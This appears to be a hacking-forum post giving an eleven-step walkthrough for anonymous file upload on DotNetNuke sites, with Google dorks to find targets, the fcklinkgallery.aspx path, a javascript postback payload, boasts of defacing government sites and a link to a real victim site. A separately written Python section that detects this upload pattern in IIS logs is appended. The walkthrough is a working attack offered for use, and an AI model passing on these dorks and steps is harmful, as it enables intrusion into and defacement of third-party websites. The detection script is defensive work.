DNN hacking

This bug was found by Pakistani researchers.
DNN (DotNetNuke) Gallery, all versions: remote file upload without authentication.
Bug found by Haris Khan
Date the bug was found: 2008/05/5
Over 10 military websites and 20 United States state websites were defaced using this bug.
Find the DNN path, then go to this file:

Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Select: File (A File On Your Site)
After it loads, put this code in place of the URL:

Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

Now you see Browse.
Select the root folder and your file will upload to
site/dnn path/Portals/0

Note: by default you can only upload *.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob,
but the admin may change this and you will have a shell.


Here is the way of hacking a site through the portal:

Step 1 :

Code:
WwW.Google.CoM

Step 2:- Now enter this
Code:
inurl:/tabid/36/language/en-US/Default.aspx

Code:
inurl:"portals/0/"

This is a dork to find vulnerable Portal sites; use it wisely.

Step 3:- You will find many sites. Select the site you are comfortable with.

Step 4:- For example, take this site.

Step 5:- Now replace

Code:
/Home/tabid/36/Language/en-US/Default.aspx

with this

Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:- You will get a Link Gallery page. So far so good!

Step 7:- Don't do anything for now; the FINAL stage is approaching.

Step 8:- Now replace the URL in the address bar with a simple script:


Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9:- You will find the Browse and Upload option.

Step 10:- Upload your package.

Step 11:- Go to http://www.site.com/portals/0/YOUR.PAGE....

Congrats, you just hacked a site.

Code:
http://www.essegielle.it/portals/0/2.swf
By Haris
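For an administrator who runs DNN, the two procedures above (the short version at the top and the eleven-step version here) leave the same footprint: an anonymous request to fcklinkgallery.aspx, a POST back to it, and then a new file appearing under /Portals/0/. The Python below is an added example, not part of the original post and not DNN's own code. It parses constructed IIS W3C extended log lines (the field names follow the standard #Fields header; the IPs, timestamps and file names are made up), flags anonymous POSTs to the gallery page, correlates them with a later fetch of a file under /Portals/<n>/ by the same client, and audits a list of file names against the default upload allowlist quoted in the note above. The 10-minute correlation window and the function names are my own choices.

```python
"""Detection helpers for the DNN FCK link-gallery upload pattern (added example).

Assumes IIS W3C extended logs with a #Fields header naming at least:
date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
"""
import re
from datetime import datetime, timedelta

# Default upload allowlist as quoted in the post (the site admin may have changed it).
DEFAULT_ALLOWED_EXTENSIONS = {
    "swf", "jpg", "jpeg", "jpe", "gif", "bmp", "png", "doc", "xls", "ppt", "pdf",
    "txt", "xml", "xsl", "css", "zip", "3gp", "asf", "asx", "avi", "flv", "m4v",
    "mov", "mp4", "mpe", "mpeg", "mpg", "ram", "rm", "rmvb", "wm", "wmv", "vob",
}

# IIS paths are case-insensitive, so everything is compared in lowercase.
GALLERY_PAGE = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
PORTAL_FILE = re.compile(r"^/portals/\d+/.+", re.IGNORECASE)

# Constructed sample log; values are invented for the example.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2008-05-05 10:01:02 198.51.100.7 - GET /Home/tabid/36/Language/en-US/Default.aspx - 200
2008-05-05 10:01:10 198.51.100.7 - GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 200
2008-05-05 10:01:31 198.51.100.7 - POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 302
2008-05-05 10:01:40 198.51.100.7 - GET /Portals/0/2.swf - 200
2008-05-05 10:05:00 203.0.113.9 admin GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 200
"""


def parse_w3c(text):
    """Turn W3C log text into a list of dicts keyed by the #Fields header names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            rows.append(dict(zip(fields, parts)))
    return rows


def _ts(row):
    return datetime.strptime(f'{row["date"]} {row["time"]}', "%Y-%m-%d %H:%M:%S")


def anonymous_gallery_posts(rows):
    """POSTs to the link-gallery page with no authenticated user: the upload postback."""
    return [
        r for r in rows
        if r["cs-uri-stem"].lower() == GALLERY_PAGE
        and r["cs-method"] == "POST"
        and r["cs-username"] == "-"
    ]


def portal_files_after_anonymous_post(rows, window=timedelta(minutes=10)):
    """Files under /Portals/<n>/ fetched by the same client within `window`
    after its anonymous POST to the gallery page (upload-then-fetch pattern)."""
    posts = [(r["c-ip"], _ts(r)) for r in anonymous_gallery_posts(rows)]
    found = []
    for r in rows:
        if r["cs-method"] != "GET" or not PORTAL_FILE.match(r["cs-uri-stem"]):
            continue
        t = _ts(r)
        if any(ip == r["c-ip"] and timedelta(0) <= t - pt <= window for ip, pt in posts):
            found.append(r["cs-uri-stem"])
    return found


def disallowed_uploads(filenames, allowed=DEFAULT_ALLOWED_EXTENSIONS):
    """Names under Portals/ whose final extension is not in the allowlist
    (or that have no extension at all). Only the last extension is checked,
    which is also all the default DNN filter looks at."""
    bad = []
    for name in filenames:
        base = name.rsplit("/", 1)[-1]
        ext = base.rsplit(".", 1)[1].lower() if "." in base else None
        if ext is None or ext not in allowed:
            bad.append(name)
    return bad


if __name__ == "__main__":
    rows = parse_w3c(SAMPLE_LOG)
    for r in anonymous_gallery_posts(rows):
        print("anonymous upload postback:", r["c-ip"], r["date"], r["time"])
    print("fetched after postback:", portal_files_after_anonymous_post(rows))
    print("outside allowlist:", disallowed_uploads(["2.swf", "logo.PNG", "page.aspx", "README"]))
```

Run against a real log directory, the first two functions give the triage list; the third is worth running over the contents of every Portals/<n>/ folder, since a file type outside the default allowlist means either the admin widened the list or the filter was bypassed.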